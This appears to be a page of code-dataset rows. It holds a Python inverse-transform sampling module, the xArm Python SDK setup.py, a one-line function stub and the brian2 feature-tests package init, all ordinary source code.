        Romberg quadrature of pdf over its support.  Maps nicely over
        iterables via np.interp.
    """
    spacing = np.abs(pdf.x[1] - pdf.x[0])  # assume a uniform grid
    A = romb(pdf.y, spacing)  # normalization constant

    def pdf_normed(x):
        """Evaluate the normalized PDF at *x* (returns 0 for negligible mass)."""
        value = np.interp(x=x, xp=pdf.x, fp=pdf.y)
        # Short-circuit: the A check runs first, so value / A is never
        # evaluated with a vanishing denominator.
        if A < 1e-3 or value / A < 1e-3:  # rule-of-thumb thresholds
            return 0
        return value / A

    return pdf_normed
def get_cdf(pdf):
    """Generate a CDF from a (possibly not normalized) pdf.

    :param pdf: object with ``x`` (support) and ``y`` (density values)
        attributes; the density need not be normalized.
    :return: cdf: the cumulative density function of the (normalized version
        of the) provided pdf.  Returns a float for a float/int input and a
        numpy array for an iterable input.
    """
    pdf_norm = normalize(pdf)  # normalized pdf, integrates to ~1
    lower_bound = np.min(pdf.x)
    upper_bound = np.max(pdf.x)

    def cdf_number(x):
        """Numerical cdf at a single scalar *x*."""
        if x <= lower_bound:
            return 0
        elif x >= upper_bound:
            return 1
        else:
            d = np.abs(x - lower_bound)
            if d > 1e-4:  # Check that spacing isn't too small for quadrature
                # Romberg integration needs 2**k + 1 evenly spaced samples.
                samples = np.linspace(lower_bound, x, 2 ** 7 + 1)
                dx = np.abs(samples[1] - samples[0])
                y = np.array([pdf_norm(s) for s in samples])
                return romb(y, dx)
            else:
                return 0

    def cdf_vector(x):
        """Vectorized cdf; falls back to the scalar path for non-iterables."""
        try:
            return np.array([cdf_number(xi) for xi in x])
        except (AttributeError, TypeError):
            # Iterating a scalar raises TypeError (not AttributeError), so
            # both must be caught for the documented float input to work.
            return cdf_number(x)

    return cdf_vector
def it_sampling(
    pdf,
    num_samples: int = 1,
    lower_bd=-np.inf,
    upper_bd=np.inf,
    k: int = None,
    cdf_y: np.array = None,
    return_cdf: bool = False,
):
    """Sample from an arbitrary, un-normalized PDF via inverse-transform sampling.

    :param pdf: object with ``x`` (support) and ``y`` (density values)
        attributes describing the (not necessarily normalized) PDF.
    :param num_samples: The number of samples to be generated.
    :param lower_bd: Lower bound of the support of the pdf. This parameter allows one to manually establish cutoffs for
    the density.
    :param upper_bd: Upper bound of the support of the pdf.
    :param k: Step number between lower_bd and upper_bd
    :param cdf_y: precomputed values of the CDF
    :param return_cdf: Option to return the computed CDF values
    :return: samples: An array of samples from the provided PDF, with support between lower_bd and upper_bd.
    """
    if k is None:
        k = 200  # Default step size
    if cdf_y is None:
        cdf = get_cdf(pdf)  # CDF of the pdf
        # NOTE(review): with the default bounds (+/-inf) this linspace is
        # degenerate — callers presumably always pass finite bounds; confirm.
        cdf_y = cdf(np.linspace(lower_bd, upper_bd, k))  # CDF values
    if return_cdf:
        return cdf_y
    else:
        if cdf_y.any():
            # Inverse-transform sampling: draw uniform seeds and map them
            # through the inverse CDF via interpolation.
            seeds = uniform(0, 1, num_samples)  # Uniformly distributed seeds
            # NOTE(review): np.interp requires len(pdf.x) == len(cdf_y) == k;
            # verify callers sample pdf on exactly k points.
            simple_samples = np.interp(x=seeds, xp=cdf_y, fp=pdf.x)  # Samples
        else:
            # Degenerate CDF (all zeros): fall back to zero samples.
            simple_samples = np.zeros(num_samples)  # Samples
        return simple_samples
| StarcoderdataPython |
140806 | <reponame>krasin/xArm-Python-SDK-ssh
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2017, UFactory, Inc.
# All rights reserved.
#
# Author: Vinman <<EMAIL>>
import os
from distutils.util import convert_path
# Prefer setuptools; fall back to distutils with a hand-rolled
# find_packages for very old environments that lack setuptools.
try:
    from setuptools import setup, find_packages
except ImportError:
    from distutils.core import setup
    def find_packages(base_path='.'):
        """Walk *base_path* and return a list of dotted package names.

        A directory counts as a package when it contains ``__init__.py``
        and its parent (if any) was itself discovered as a package.
        """
        base_path = convert_path(base_path)
        found = []
        for root, dirs, files in os.walk(base_path, followlinks=True):
            # Prune hidden dirs and known non-package dirs in place so
            # os.walk does not descend into them.
            dirs[:] = [d for d in dirs if d[0] != '.' and d not in ('ez_setup', '__pycache__')]
            relpath = os.path.relpath(root, base_path)
            parent = relpath.replace(os.sep, '.').lstrip('.')
            if relpath != '.' and parent not in found:
                # foo.bar package but no foo package, skip
                continue
            for dir in dirs:
                if os.path.isfile(os.path.join(root, dir, '__init__.py')):
                    package = '.'.join((parent, dir)) if parent else dir
                    found.append(package)
        return found
# Read the package version from xarm/version.py without importing the
# package (importing could pull in its runtime dependencies).
main_ns = {}
ver_path = convert_path('xarm/version.py')
with open(os.path.join(os.getcwd(), ver_path)) as ver_file:
    exec(ver_file.read(), main_ns)
version = main_ns['__version__']
# long_description = open('README.rst').read()
long_description = 'long description for xArm-Python-SDK'
# Install requirements are maintained in requirements.txt, one per line.
with open(os.path.join(os.getcwd(), 'requirements.txt')) as f:
    requirements = f.read().splitlines()
setup(
    name='xArm-Python-SDK',
    version=version,
    author='Vinman',
    description='Python SDK for xArm',
    packages=find_packages(),
    author_email='<EMAIL>',
    install_requires=requirements,
    long_description=long_description,
    license='MIT',
    zip_safe=False
)
| StarcoderdataPython |
3203285 | def check_alive(health):
| StarcoderdataPython |
195050 | <reponame>rgerkin/brian2<filename>brian2/tests/features/__init__.py
from __future__ import absolute_import
# Public API of the features test package.
__all__ = ['FeatureTest',
           'SpeedTest',
           'InaccuracyError',
           'Configuration',
           'run_feature_tests']
# Re-export the base classes and pull in the feature-test submodules.
from .base import *
from . import neurongroup
from . import synapses
from . import monitors
from . import input
from . import speed
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.